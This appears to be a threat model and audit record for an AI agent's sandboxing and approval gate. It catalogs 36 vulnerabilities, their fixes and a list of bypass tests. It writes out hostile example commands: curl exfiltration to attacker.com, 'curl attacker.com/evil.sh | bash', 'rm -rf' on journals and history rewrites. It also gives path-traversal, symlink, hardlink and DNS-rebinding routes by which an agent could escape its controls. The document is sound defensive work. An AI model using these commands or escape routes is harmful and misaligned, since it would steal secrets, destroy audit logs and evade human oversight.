Version: 1.0
Date: February 6, 2026
Audit: ChatGPT (OpenAI), February 5, 2026
Status: 36 Vulnerabilities Found, 36 Fixed, Production-Approved
This document catalogs the complete threat landscape discovered during the ChatGPT security audit of the AOS Constitutional Gate, conducted February 5, 2026.
Audit results:
Key finding: Through rigorous, iterative security review, we evolved from a "hope-based" policy system to a cryptographically-enforced constitutional gate with multiple layers of defense-in-depth.
Adversarial agent assumed to have:
Out of scope for v1.0:
Context: Initial policy-based design with guardrails.yaml enforcement
Severity: CRITICAL
Category: Access Control
Description:
The run_command tool was in the allowlist without restrictions. An adversarial agent could execute arbitrary shell commands, including:
rm -rf /brain/stream (delete journals)git reset --hard HEAD~10 (rewrite history)curl attacker.com < /brain/evidence/secrets.json (exfiltrate data)Fix:
run_command to require human approvalVerification: BYP-006 (command execution bypass test)
Severity: CRITICAL
Category: Authorization
Description: Policy defined path allowlists, but enforcement code didn't check them. Agent could write to any path, including:
/brain/stream/*.log (corrupt journals)/brain/.git/ (tamper with history)/etc/passwd (escalate privileges if run as root)Fix:
validateAndCanonicalizePath() functionVerification: BYP-001 (path traversal test)
Severity: HIGH
Category: Error Handling
Description: Multiple try/catch blocks had empty catch clauses or logged errors without denying execution. Example:
try {
await validateScope(path);
} catch (error) {
console.error(error); // ⚠️ No DENY!
}
await executeFileWrite(path); // Executes even if validation failed
Fix:
Verification: Exception injection tests
Severity: HIGH
Category: Accountability
Description: Executors didn't require attestations. Even if policy checked, there was no cryptographic proof that validation occurred.
Fix:
Verification: Attestation verification tests
Severity: MEDIUM
Category: Denial of Service
Description: No limits on tool call frequency or data volume. Agent could:
Fix:
Verification: Budget exhaustion tests
VUL-006: No category checking (could violate humanitarian license)
Fix: Added prohibited category classifier
VUL-007: Missing approval mechanism (no human-in-the-loop)
Fix: Implemented out-of-band approval service
VUL-008: No journal logging (no audit trail)
Fix: Created chained, signed journal entries
VUL-009: No startup validation (broken config could be loaded)
Fix: Startup self-tests with fail-closed behavior
Context: After Pass 1 fixes, more subtle attack vectors emerged
Severity: HIGH
Category: Logic Error
Description:
Policy used git.commit but executor registered as git_commit. An agent could call git.reset (not in policy) because no executor existed, causing undefined behavior.
Fix:
git.commit)Verification: BYP-013 (unknown tool test)
Severity: HIGH
Category: Path Manipulation
Description: Even with path validation, multiple bypass routes existed:
../../../etc/passwd (classic traversal)%2e%2e%2f (URL-encoded traversal)/brain/now/../../stream/journal.log (relative traversal)Fix:
path.resolve()Verification: BYP-001, BYP-012 (encoded traversal)
Severity: HIGH
Category: Filesystem Manipulation
Description: Agent could create symlink in allowed path pointing to protected path:
ln -s /brain/stream/journal.log /brain/now/fake.txt
# Then write to /brain/now/fake.txt → overwrites journal
Fix:
Verification: BYP-003 (symlink bypass test)
Severity: MEDIUM
Category: Filesystem Manipulation
Description: Agent could hardlink protected file into allowed path, then modify:
ln /brain/stream/journal.log /brain/now/copy.log
# Both paths point to same inode - modify one, both change
Fix:
Verification: BYP-011 (hardlink test)
Severity: HIGH
Category: Race Condition
Description: Time-of-check-time-of-use vulnerability:
write_file('/brain/now/good.txt', 'safe data')write_file('/brain/stream/journal.log', 'evil')Fix:
Verification: TOCTOU test
Severity: HIGH
Category: Container Escape
Description:
run_command sandbox had network namespace, allowing:
curl attacker.com -d @/brain/now/secrets.txtcurl attacker.com/evil.sh | bashFix:
Verification: BYP-015 (sandbox network test)
Severity: MEDIUM
Category: Container Configuration
Description: Sandbox mounted /brain/now as read-write, allowing:
Fix:
Verification: BYP-015 (sandbox write test)
Severity: MEDIUM
Category: HTTP Protocol
Description: Agent could request allowed domain that redirects to forbidden domain:
1. Request: https://allowed.com/redirect
2. 302 → https://evil.com/exfiltrate
3. Gate follows redirect without rechecking allowlist
Fix:
Verification: BYP-009 (redirect test)
Context: Moving from "works in testing" to "production-grade"
Severity: HIGH
Category: Implementation Bug
Description:
Node.js fs.writeFile() doesn't support O_NOFOLLOW directly. Using it does nothing - symlinks still followed.
Fix:
fs.open() with explicit flags/proc/self/fd/<fd> pathVerification: Symlink tests with actual fs operations
Severity: HIGH
Category: Canonicalization
Description: SHA-256 of JSON.stringify depends on key order:
JSON.stringify({b: 2, a: 1}) !== JSON.stringify({a: 1, b: 2})
Agent could reorder object keys to get different hash, bypassing TOCTOU protection.
Fix:
Verification: BYP-014 (nested args hash test)
Severity: MEDIUM
Category: Container Security
Description:
Seccomp profile blocked execve but allowed run_command. Commands couldn't execute, causing failures.
Fix:
Verification: Command execution in sandbox
Severity: MEDIUM
Category: Race Condition
Description:
Journal files created normally, then chattr +a applied later. Between creation and attribute setting, file could be overwritten.
Fix:
safeCreateFile() with atomic flagsVerification: File creation race test
Severity: MEDIUM
Category: Network Security
Description: Attacker controls DNS, can rebind domain to private IP:
1. Gate checks: allowed.com → 1.2.3.4 (public) → ALLOW
2. DNS rebinds: allowed.com → 192.168.1.1 (private)
3. Gate connects → accesses internal network
Fix:
Verification: BYP-010 (DNS rebinding test)
Context: Ensuring production correctness of all mechanisms
Severity: HIGH
Category: Protocol Error
Description:
Unix socket handler assumed one data event = one complete JSON message. TCP can split/coalesce messages, causing:
Fix:
Verification: Chunked message tests
Severity: MEDIUM
Category: Architecture
Description: Documentation unclear if agent trusted or not trusted. Mix of "agent cannot access socket" and "socket allows agent".
Fix:
Verification: Documentation review
Severity: MEDIUM
Category: Cryptographic Binding
Description: Request auth token (if we kept HMAC) bound to toolName + argsHash only. Didn't bind to full decision, allowing replay with different policy.
Fix:
Verification: Auth token tests (or removal)
Severity: LOW
Category: Portability
Description:
/proc/self/fd/<fd> check is Linux-specific. On other platforms, fails unpredictably.
Fix:
Verification: Platform check test
Severity: LOW
Category: Filesystem Dependency
Description:
chattr +a requires ext4/btrfs. On other filesystems (xfs, zfs), command fails silently.
Fix:
Verification: Append-only test at startup
Severity: LOW
Category: Documentation
Description: Seccomp tried to limit clone() flags, but that's unreliable. Unclear if relying on seccomp or cgroups for process limits.
Fix:
Verification: Multi-layer enforcement tests
Severity: LOW
Category: UX / Logic
Description: If agent asks ambiguous question in single-shot mode, gate must DENY. But unclear how to handle in practice.
Fix:
Verification: Ambiguous request tests
Context: Final security review before production approval
Severity: MEDIUM
Category: IPC Security
Description: Socket perms + UID check implementation wasn't consistent with stated trust boundary.
Fix:
Verification: SO_PEERCRED tests
Severity: HIGH
Category: Cryptographic Flaw
Description: Classic attack: token included approver public key. Attacker can:
Fix:
Verification: Token forgery test
Severity: HIGH
Category: Replay Protection
Description: Nonces stored in-memory Set. Gate restart → Set cleared → nonces reusable within freshness window.
Fix:
Verification: Restart + replay test
Severity: MEDIUM
Category: Cryptographic Protocol
Description: Code signed "hex string of hash" but unclear if that's ASCII hex or raw bytes. Easy to get inconsistent.
Fix:
Verification: Signature interop tests
Severity: LOW
Category: Implementation Gap
Description:
Code showed require('getsockopt') as placeholder. Not a real package.
Fix:
Verification: Actual peer verification
Severity: LOW
Category: Trust Root
Description: Approver registry needed integrity protection. How do we know it's not tampered?
Fix:
Verification: Registry tampering test
Severity: LOW
Category: Standards Compliance
Description: Claimed RFC 8785 compliance but no test vectors to prove it.
Fix:
Verification: RFC test vector suite
Layer 1: Process Isolation
Layer 2: OS-Level Constraints
Layer 3: Cryptographic Enforcement
Layer 4: Fail-Closed Behavior
Layer 5: Immutable Logging
✅ Agent cannot write to protected paths (OS permissions)
✅ Agent cannot bypass gate (executors only in gate process)
✅ Agent cannot forge attestations (gate private key never exposed)
✅ Agent cannot forge approval tokens (approver keys in registry)
✅ Agent cannot replay requests (durable nonce storage)
✅ Agent cannot access sandbox network (no network namespace)
✅ Agent cannot escape via symlinks (O_NOFOLLOW enforced)
✅ Agent cannot escape via hardlinks (nlink count check)
✅ Agent cannot traverse paths (canonicalization)
✅ Agent cannot rebind DNS (IP pinning)
✅ Agent cannot TOCTOU approval (args hash binding)
❌ OS kernel compromise (requires trusted kernel)
❌ Hardware attacks (TPM integration planned Q1 2026)
❌ Side channel attacks (timing, speculation)
❌ Physical access (server room security)
❌ Social engineering (human approver decision)
BYP-001: Path traversal (../../../etc/passwd)
BYP-002: Absolute path to protected file
BYP-003: Symlink to protected path
BYP-004: Network request to private IP
BYP-005: Network request to forbidden domain
BYP-006: Parallel executor access
BYP-007: Missing attestation execution
BYP-008: Invalid approval token
BYP-009: Network redirect to forbidden domain
BYP-010: DNS rebinding to private IP
BYP-011: Hardlink to protected file
BYP-012: Encoded path traversal (%2e%2e%2f)
BYP-013: Unknown tool execution
BYP-014: Nested args TOCTOU via key reordering
BYP-015: Sandbox write to protected path
Result: 15/15 tests pass (100% required for production)
Security audit partner:
Implementation:
Development environment:
Human leadership:
AOS Constitutional Gate Threat Model v1.0
February 6, 2026
36 Vulnerabilities, 36 Fixes, Production-Approved
💙⚖️🛡️